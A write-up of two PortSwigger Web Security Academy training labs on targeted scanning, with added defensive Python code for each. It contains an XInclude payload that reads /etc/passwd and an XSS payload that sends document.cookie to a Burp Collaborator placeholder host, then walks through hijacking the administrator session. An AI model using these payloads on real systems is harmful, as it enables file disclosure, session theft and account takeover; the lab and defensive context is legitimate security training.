Labs Covered
This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy related to Essential Skills:
Discovering vulnerabilities quickly with targeted scanning
This lab demonstrates how to use targeted scanning techniques to identify vulnerabilities more efficiently by focusing on likely problem areas.
Scanning non-standard data structures
This lab shows how to identify and scan non-standard or complex data structures that may not be handled effectively by typical scanning tools.
LAB 1 - Discovering vulnerabilities quickly with targeted scanning
Lab Description
Solution
1. Identifying a Suspicious URL
- Start by browsing the application and identifying any URL or feature that might be parsing XML or making server-side HTTP requests.
- In this lab, you identify /product/stock as the likely vulnerable target.
2. Run Active Scan
- Send the request to Burp Scanner and run an active scan on it.
- After the active scan completes, Burp reports an Out-of-band resource load issue on this endpoint, indicating it may be vulnerable to XXE or XInclude-based file inclusion.
3. Analyzing the Scanner Finding
- The scanner reports that it’s possible to induce the application to load external resources, which hints at insecure XML parsing or XInclude being enabled on the server.
4. Send Request to Repeater
- Forward the same request (from the scanner or proxy) to Burp Repeater for manual testing.
- Observe the body parameters; the productId parameter is typically the XML input field to focus on.
5. Injecting Malicious Payload
- Modify the productId XML input with an XInclude payload to try accessing sensitive files, like /etc/passwd.
Payload:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
6. Analyze the Response
- Send the modified request.
- If the server is vulnerable and XInclude is enabled, the server will parse the injected file and return its contents in the HTTP response.
- You should now see the contents of /etc/passwd in the response body.
Lab Solved
You’ve confirmed that the application is vulnerable to XInclude-based file inclusion, and you were able to read arbitrary files from the server using a crafted XML payload.
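The server-side counterpart of this finding, as an added example that is not part of the original write-up or of the lab application: a validator that a stock-check endpoint could run on the incoming body before any XML processing. It treats any element in the XInclude namespace as a hard reject and requires productId to be plain numeric text, so the payload above is refused with a loggable reason instead of being resolved. The stockCheck/productId/storeId body layout is an assumption; the write-up only states that the endpoint parses XML and that productId is the interesting parameter.

```python
import re
import xml.etree.ElementTree as ET

# Namespace that XInclude directives live in; any element in this namespace
# inside a request body is a red flag for an endpoint like /product/stock.
XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# A productId is expected to be a small positive integer (assumed shape).
PRODUCT_ID_RE = re.compile(r"\d{1,9}")


def contains_xinclude(root):
    """Return True if any element in the parsed tree is an XInclude directive."""
    return any(el.tag.startswith("{" + XINCLUDE_NS + "}") for el in root.iter())


def check_stock_request(xml_text):
    """Validate an incoming stock-check body before it reaches any XML processing.

    Returns (accepted, detail). On success detail is the integer product id;
    on rejection detail is the reason, suitable for a log line or WAF alert.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"

    # Reject XInclude directives outright instead of relying on every
    # downstream parser having XInclude processing switched off.
    if contains_xinclude(root):
        return False, "XInclude directive present in request body"

    product_el = root.find("productId")
    if product_el is None:
        return False, "productId element missing"

    # productId must be plain text: child elements (such as a wrapper around
    # an xi:include) or non-numeric text are rejected.
    if len(product_el) > 0:
        return False, "productId contains child elements"
    value = (product_el.text or "").strip()
    if not PRODUCT_ID_RE.fullmatch(value):
        return False, "productId is not a small positive integer"

    return True, int(value)


# Constructed sample bodies (hypothetical layout): a legitimate stock check
# and the write-up's XInclude payload placed inside productId.
LEGIT_BODY = "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
XINCLUDE_BODY = (
    "<stockCheck><productId>"
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</foo></productId><storeId>1</storeId></stockCheck>"
)

if __name__ == "__main__":
    for body in (LEGIT_BODY, XINCLUDE_BODY):
        print(check_stock_request(body))
```

The check is deliberately an allow-list on the one field the endpoint needs rather than a deny-list of bad strings: a numeric productId cannot carry markup at all, and the namespace check catches XInclude regardless of prefix or wrapper element.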
LAB 2 - Scanning non-standard data structures
Lab Description
Solution
1. Install Required Extensions
- Install any necessary browser or Burp Suite extensions to assist with testing and decoding (e.g., “HackTools” for payloads or “JSON Viewer”).
2. Login as Wiener
- Log in with the wiener user credentials provided in the lab.
3. Send Authenticated Request to Repeater
- After logging in, intercept any request (e.g., to the account page) and send it to Burp Repeater.
- This allows you to examine and manipulate the request more easily.
4. Decode the Session Cookie
- Decode the session cookie using Base64 decoding or JWT decoder, depending on the format.
- You’ll likely see structured content with identifiable parameter names.
5. Manual Fuzzing
- Try manually inserting payloads into visible fields like profile bio, username, or other form inputs.
- In this case, manual testing does not turn up any reflected XSS, so you try another method.
6. Send to Intruder
- Send the profile update request to Burp Intruder.
- Use cluster bomb or pitchfork mode with common XSS payloads to find possible injection points.
7. Scan for XSS Insertion Point
- Begin active scanning or custom payload injection using Intruder.
- After analyzing responses, you discover that one parameter reflects content back — a stored XSS vulnerability is identified.
Running an insertion-point scan
The scan reports a stored cross-site scripting issue at this insertion point.
8. Craft XSS Payload
- Send a basic XSS payload to Repeater to verify that it is reflected and executes.
- Once verified, move to building a data exfiltration payload.
Decoded payload
9. Create Payload for Collaborator
- Craft an XSS payload to steal the session cookie using Burp Collaborator:
"><svg/onload=fetch(`//YOUR-COLLABORATOR-ID.burpcollaborator.net?cookie=${encodeURIComponent(document.cookie)}`)>
- Replace YOUR-COLLABORATOR-ID with your actual Burp Collaborator payload URL.
10. Submit Payload and Wait
- Submit the above payload in the vulnerable parameter (e.g., bio, message, comment).
- Wait for the administrator to view the page, triggering the XSS and sending their cookie to your Burp Collaborator.
11. Capture Administrator’s Cookie
- In Burp Collaborator client, monitor the DNS or HTTP log.
- You should see a request containing the administrator’s session cookie.
12. Decode Administrator’s Cookie
- Copy the stolen cookie value and decode it (if encoded) to inspect its contents.
- This verifies you got the right session.
13. Impersonate Administrator
- Take the administrator’s session cookie (only the value before the first semicolon).
- Replace wiener’s session cookie with this one using Burp or browser dev tools.
- URL-encode the value and paste it in the Cookie header.
14. Reload and Delete Carlos
- Reload the page.
- You should now be logged in as the administrator.
- Go to the admin panel, find Carlos, and delete his account.
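The same weakness seen from the application's side, as an added example that is not part of the original write-up or of the lab: it decodes a Base64 session cookie, flags cookies whose decoded username field no longer looks like a username, and shows the unescaped rendering that makes the stored XSS possible beside an HTML-escaped version. The cookie layout base64("username:token") is an assumption standing in for whatever structured content the decoder shows in step 4; the hardened Set-Cookie header is included because an HttpOnly session cookie is not readable through document.cookie, which is what the Collaborator payload relies on.

```python
import base64
import html
import re

# Assumed cookie layout: base64("username:token"). The write-up only says the
# decoded cookie shows structured content; this shape is a stand-in for it.
USERNAME_RE = re.compile(r"[a-z0-9_-]{1,32}")


def decode_session_cookie(cookie_value):
    """Decode a Base64 session cookie into its username and token fields, or None."""
    try:
        raw = base64.b64decode(cookie_value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    username, sep, token = raw.partition(":")
    if not sep:
        return None
    return {"username": username, "token": token}


def encode_session_cookie(username, token):
    """Inverse of decode_session_cookie, used here only to build constructed samples."""
    return base64.b64encode(f"{username}:{token}".encode()).decode()


def render_banner_vulnerable(username):
    """The pattern the lab exploits: cookie-derived text dropped into HTML as-is."""
    return f'<div class="user">Welcome back, {username}</div>'


def render_banner_safe(username):
    """Same banner with HTML entity encoding; injected tags become inert text."""
    return f'<div class="user">Welcome back, {html.escape(username, quote=True)}</div>'


def cookie_looks_tampered(cookie_value):
    """True when the cookie does not decode to a plausible username:token pair.

    Useful as a log-time detector: a session cookie whose username field
    contains quotes or angle brackets was edited by the client.
    """
    fields = decode_session_cookie(cookie_value)
    return fields is None or USERNAME_RE.fullmatch(fields["username"]) is None


def hardened_set_cookie(cookie_value):
    """Set-Cookie header that keeps the session out of document.cookie (HttpOnly)."""
    return f"session={cookie_value}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Constructed samples: a normal cookie and one whose username field carries a
# harmless markup probe of the kind the insertion-point scan injects.
NORMAL_COOKIE = encode_session_cookie("wiener", "constructed-token-0001")
TAMPERED_COOKIE = encode_session_cookie('"><svg/onload=alert(1)>', "constructed-token-0001")

if __name__ == "__main__":
    for cookie in (NORMAL_COOKIE, TAMPERED_COOKIE):
        fields = decode_session_cookie(cookie)
        print(cookie_looks_tampered(cookie), render_banner_safe(fields["username"]))
```

Two independent controls are shown on purpose: output encoding removes the XSS regardless of where the value came from, and the HttpOnly attribute limits what a script that does run can reach. Neither replaces validating the cookie server-side; the tamper check gives you a signal to log and alert on when a client rewrites its own cookie.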